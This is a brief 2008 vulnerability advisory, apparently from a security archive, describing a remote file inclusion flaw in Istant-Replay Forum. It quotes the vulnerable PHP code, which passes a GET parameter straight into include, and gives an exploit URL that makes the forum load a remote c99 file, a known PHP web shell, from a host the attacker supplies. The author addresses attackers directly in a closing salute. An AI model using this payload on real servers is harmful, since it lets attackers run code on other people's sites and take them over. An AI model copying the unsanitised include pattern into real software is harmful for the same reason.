Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19669
HistoryApr 16, 2008 - 12:00 a.m.

remote file include

2008-04-1600:00:00
vulners.com
35

#########################################################################
Istant-Replay Forum Remote File Inclusion Vulnerability
#########################################################################

AUTHOR: THuGM4N

Email : [email protected]

Script : Istant-Replay Forum

Site : http://www.chattaitaliano.com

Vulnerable CODE :

$a = $_GET['data'];
$b = $_GET['post'];

$foo = include "$a.txt";

BUT THE EXPLOIT IS LIKE THAT :

http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt?

BIGUP 2 All Attackers Around The World .

#########################################################################
Istant-Replay Forum Remote File Inclusion Vulnerability
#########################################################################